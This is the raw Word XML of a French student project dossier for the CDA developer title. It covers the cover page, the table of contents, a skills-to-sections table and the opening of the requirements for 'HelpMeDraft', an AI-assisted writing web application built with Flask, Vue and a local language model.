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7562" w14:textId="0F02B891" w:rsidR="003A2DEC" w:rsidRDefault="003A2DEC"/>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="187" w:rightFromText="187" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="2881"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="4472C4" w:themeColor="accent1"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="144" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLayout w:type="autofit"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7246"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A2DEC" w14:paraId="5ABF774E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="216" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="216" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4FC1D970" w14:textId="77777777" w:rsidR="003A2DEC" w:rsidRDefault="003A2DEC">
            <w:pPr>
              <w:pStyle w:val="Sansinterligne"/>
              <w:rPr>
                <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>LexiCorp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2DEC" w14:paraId="7AC04B7E" w14:textId="77777777">
        <w:tc>
          <w:tcPr/>
          <w:p w14:paraId="7E50BF1A" w14:textId="5DCEEACE" w:rsidR="003A2DEC" w:rsidRDefault="003A2DEC">
            <w:pPr>
              <w:pStyle w:val="Sansinterligne"/>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Dossier projet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2DEC" w14:paraId="7CC0BCFF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="216" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="216" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3E1D1523" w14:textId="549724AD" w:rsidR="003A2DEC" w:rsidRDefault="003A2DEC">
            <w:pPr>
              <w:pStyle w:val="Sansinterligne"/>
              <w:rPr>
                <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>HelpMeDraft — assistant de rédaction assistée par IA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="187" w:rightFromText="187" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpYSpec="bottom"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLayout w:type="autofit"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6998"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A2DEC" w14:paraId="7DFAA099" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="216" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="216" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="091F8850" w14:textId="4E993FF7" w:rsidR="003A2DEC" w:rsidRDefault="003A2DEC">
            <w:pPr>
              <w:pStyle w:val="Sansinterligne"/>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Ophélie Bellissens  /  CDA  /  Metz Numeric School</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t/>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="19BD1A57" w14:textId="77777777" w:rsidR="003A2DEC" w:rsidRDefault="003A2DEC">
            <w:pPr>
              <w:pStyle w:val="Sansinterligne"/>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Octobre 2026</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06A834B4" w14:textId="77777777" w:rsidR="003A2DEC" w:rsidRDefault="003A2DEC">
            <w:pPr>
              <w:pStyle w:val="Sansinterligne"/>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="101A3917" w14:textId="1D242741" w:rsidR="003A2DEC" w:rsidRDefault="003A2DEC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-38128262"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="430BC915" w14:textId="3C7C127A" w:rsidR="00B1648B" w:rsidRDefault="00B1648B" w:rsidP="00B1648B">
          <w:pPr>
            <w:pStyle w:val="En-ttedetabledesmatires"/>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r>
            <w:t>Table des matières</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fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>1.</w:t>
            <w:tab/>
            <w:t>La liste des compétences mises en œuvre dans le cadre du projet</w:t>
            <w:tab/>
            <w:t>3</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2.</w:t>
            <w:tab/>
            <w:t>Le cahier des charges ou l’expression des besoins du projet</w:t>
            <w:tab/>
            <w:t>4</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3.</w:t>
            <w:tab/>
            <w:t>- la présentation de l’entreprise et du service</w:t>
            <w:tab/>
            <w:t>6</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4.</w:t>
            <w:tab/>
            <w:t>La gestion de projet</w:t>
            <w:tab/>
            <w:t>6</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5.</w:t>
            <w:tab/>
            <w:t>Les spécifications fonctionnelles du projet</w:t>
            <w:tab/>
            <w:t>9</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5.1.</w:t>
            <w:tab/>
            <w:t>Les contraintes du projet et livrables attendus</w:t>
            <w:tab/>
            <w:t>9</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5.2.</w:t>
            <w:tab/>
            <w:t>L’architecture logicielle du projet</w:t>
            <w:tab/>
            <w:t>11</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5.3.</w:t>
            <w:tab/>
            <w:t>Les maquettes et enchaînement des maquettes</w:t>
            <w:tab/>
            <w:t>13</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5.4.</w:t>
            <w:tab/>
            <w:t>Le modèle entités-associations et modèle physique de la base de données</w:t>
            <w:tab/>
            <w:t>17</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5.5.</w:t>
            <w:tab/>
            <w:t>Le script de création ou de modification de la base de données</w:t>
            <w:tab/>
            <w:t>23</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5.6.</w:t>
            <w:tab/>
            <w:t>Le diagramme du comportement des fonctionnalités de type cas d’utilisations</w:t>
            <w:tab/>
            <w:t>25</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5.7.</w:t>
            <w:tab/>
            <w:t>Le diagramme du détail des cas d’utilisations les plus significatifs de type diagramme de séquence</w:t>
            <w:tab/>
            <w:t>26</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6.</w:t>
            <w:tab/>
            <w:t>Les spécifications techniques du projet</w:t>
            <w:tab/>
            <w:t>28</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7.</w:t>
            <w:tab/>
            <w:t>Les réalisations du candidat comportant les extraits de code les plus significatifs, les arguments qui ont conduit à ses choix, y compris pour la sécurité</w:t>
            <w:tab/>
            <w:t>34</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7.1.</w:t>
            <w:tab/>
            <w:t>Les captures d’écran d’interfaces utilisateur et le code correspondant</w:t>
            <w:tab/>
            <w:t>34</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7.2.</w:t>
            <w:tab/>
            <w:t>Des extraits de code de composants métier</w:t>
            <w:tab/>
            <w:t>38</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7.3.</w:t>
            <w:tab/>
            <w:t>Des extraits de code de composants d’accès aux données</w:t>
            <w:tab/>
            <w:t>39</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7.4.</w:t>
            <w:tab/>
            <w:t>Des extraits de code d’autres composants</w:t>
            <w:tab/>
            <w:t>42</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8.</w:t>
            <w:tab/>
            <w:t>La présentation d’éléments de sécurité de l’application</w:t>
            <w:tab/>
            <w:t>44</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9.</w:t>
            <w:tab/>
            <w:t>La présentation du plan de tests</w:t>
            <w:tab/>
            <w:t>49</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10.</w:t>
            <w:tab/>
            <w:t>La présentation d’un jeu d’essai élaboré par le candidat</w:t>
            <w:tab/>
            <w:t>56</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11.</w:t>
            <w:tab/>
            <w:t>- la description de la veille, effectuée par le candidat</w:t>
            <w:tab/>
            <w:t>59</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12.</w:t>
            <w:tab/>
            <w:t>ANNEXES</w:t>
            <w:tab/>
            <w:t>63</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12.1.</w:t>
            <w:tab/>
            <w:t>Les maquettes des interfaces utilisateur</w:t>
            <w:tab/>
            <w:t>63</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12.2.</w:t>
            <w:tab/>
            <w:t>Les captures d’écrans d’interfaces utilisateurs et le code correspondant</w:t>
            <w:tab/>
            <w:t>67</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12.3.</w:t>
            <w:tab/>
            <w:t>Le code de composants métier les plus significatifs</w:t>
            <w:tab/>
            <w:t>72</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12.4.</w:t>
            <w:tab/>
            <w:t>Le code de composants d’accès aux données les plus significatifs</w:t>
            <w:tab/>
            <w:t>76</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6A4DC3DC" w14:textId="3EAAA4CB" w:rsidR="00942915" w:rsidRDefault="00B1648B">
          <w:pPr>
            <w:pStyle w:val="TM1"/>
            <w:tabs>
              <w:tab w:pos="737" w:val="left"/>
              <w:tab w:pos="9638" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:ind w:left="737" w:hanging="737"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:t>12.5.</w:t>
            <w:tab/>
            <w:t>Le code d’autres composants</w:t>
            <w:tab/>
            <w:t>79</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="400632DD" w14:textId="3EE4670A" w:rsidR="00B1648B" w:rsidRDefault="00B1648B" w:rsidP="00B1648B">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="7011BD30" w14:textId="77777777" w:rsidR="00B1648B" w:rsidRDefault="00B1648B" w:rsidP="00B1648B"/>
    <w:p w14:paraId="655D83B9" w14:textId="77777777" w:rsidR="00B1648B" w:rsidRDefault="00B1648B" w:rsidP="00B1648B">
      <w:pPr>
        <w:sectPr w:rsidR="00B1648B" w:rsidSect="003A2DEC">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pgNumType w:start="1"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="416AD645" w14:textId="2EFC2F6C" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="003A2DEC" w:rsidP="00B1648B">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc198828305"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>La liste des compétences mises en œuvre dans le cadre du projet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le projet HelpMeDraft couvre les trois activités types du titre Concepteur Développeur d'Applications. Le tableau ci-dessous relie chaque compétence du REAC à la réalisation concrète qui en atteste dans ce dossier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Activité type 1 — Développer une application sécurisée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Installer et configurer son environnement de travail en fonction du projet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Environnement Python 3.11 / venv + Node 20 / npm, VS Code, Git et dépôt GitHub distant, Ollama installé en local pour l'inférence, Mailtrap comme serveur SMTP de test, fichier .env.example documentant toutes les variables attendues, conteneurisation Docker et pipeline GitHub Actions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Développer des interfaces utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">15 vues Vue 3 + TypeScript (accueil, inscription, connexion, tableau de bord, liste de documents, éditeur, back-office, pages légales), composants réutilisables</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">MarkdownEditor</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Nav</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Footer</w:t>
            </w:r>
            <w:r>
              <w:t>, mise en page responsive avec Tailwind CSS 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 7.1, § 12.1, § 12.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Développer des composants métier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Couche</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">services/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">du backend indépendante de Flask :</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">auth_service</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(hachage bcrypt, émission et vérification des JWT, rotation des refresh tokens),</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ia_service</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(prompt engineering et appel au modèle),</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">email_service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 7.2, § 12.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Contribuer à la gestion d'un projet informatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Découpage en lots, planification sur la base du plan de développement du cahier des charges, suivi de l'avancement, gestion des versions par branches Git et commits conventionnés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Activité type 2 — Concevoir et développer une application sécurisée organisée en couches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Analyser les besoins et maquetter une application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Analyse du cahier des charges LexiCorp, formalisation en cas d'utilisation, maquettes des écrans et schéma d'enchaînement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 5.3, § 5.6, § 12.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Définir l'architecture logicielle d'une application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Architecture client/serveur découplée : SPA Vue consommant une API REST Flask organisée en trois couches (routes → services → persistance)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Concevoir et mettre en place une base de données relationnelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modèle entités-associations puis modèle physique à sept tables, identifiants UUID, contraintes d'intégrité référentielle, index de performance et script de création MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 5.4, § 5.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Développer des composants d'accès aux données SQL et NoSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Couche de persistance SQLAlchemy 2 : modèles, relations, requêtes paramétrées, agrégations pour les statistiques du back-office</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 7.3, § 12.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Activité type 3 — Préparer le déploiement d'une application sécurisée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Préparer et exécuter les plans de tests d'une application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Plan de tests fonctionnels et unitaires, jeu d'essai de la fonctionnalité de génération IA, tests de sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 9, § 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Préparer et documenter le déploiement d'une application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conteneurisation Docker, script de création du schéma MySQL et script de migration, documentation d'installation et de lancement, gestion de la configuration par variables d'environnement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 5.5, § 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Contribuer à la mise en production dans une démarche DevOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pipeline d'intégration continue GitHub Actions (lint, tests, build)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Compétences transversales</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>— La veille technique menée pendant le projet (§ 11) atteste de la compétence « Apprendre en continu » : elle a conduit à identifier une vulnérabilité affectant réellement le projet et une obligation réglementaire postérieure au cahier des charges. La démarche de résolution de problème est illustrée par les arbitrages techniques documentés en § 5.2 et § 6, notamment le choix d'un modèle de langage local. La lecture de la documentation technique anglophone (Flask, SQLAlchemy, Ollama, avis de sécurité GitHub et CISA, OWASP) couvre la compétence « Communiquer en français et en anglais ».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAAF81F" w14:textId="5AAD3F46" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="003A2DEC" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc198828306"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Le cahier des charges ou l’expression des besoins du projet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Contexte de la demande</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LexiCorp, éditeur d'outils de gestion documentaire pour les PME, souhaite élargir son catalogue avec un nouveau service en ligne. Le constat de départ est simple : dans une PME, la rédaction des écrits professionnels courants — courriels clients, notes internes, comptes rendus, rapports — mobilise un temps significatif de collaborateurs qui ne sont pas des rédacteurs professionnels. La qualité de ces écrits est inégale et ils sont souvent repris plusieurs fois.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
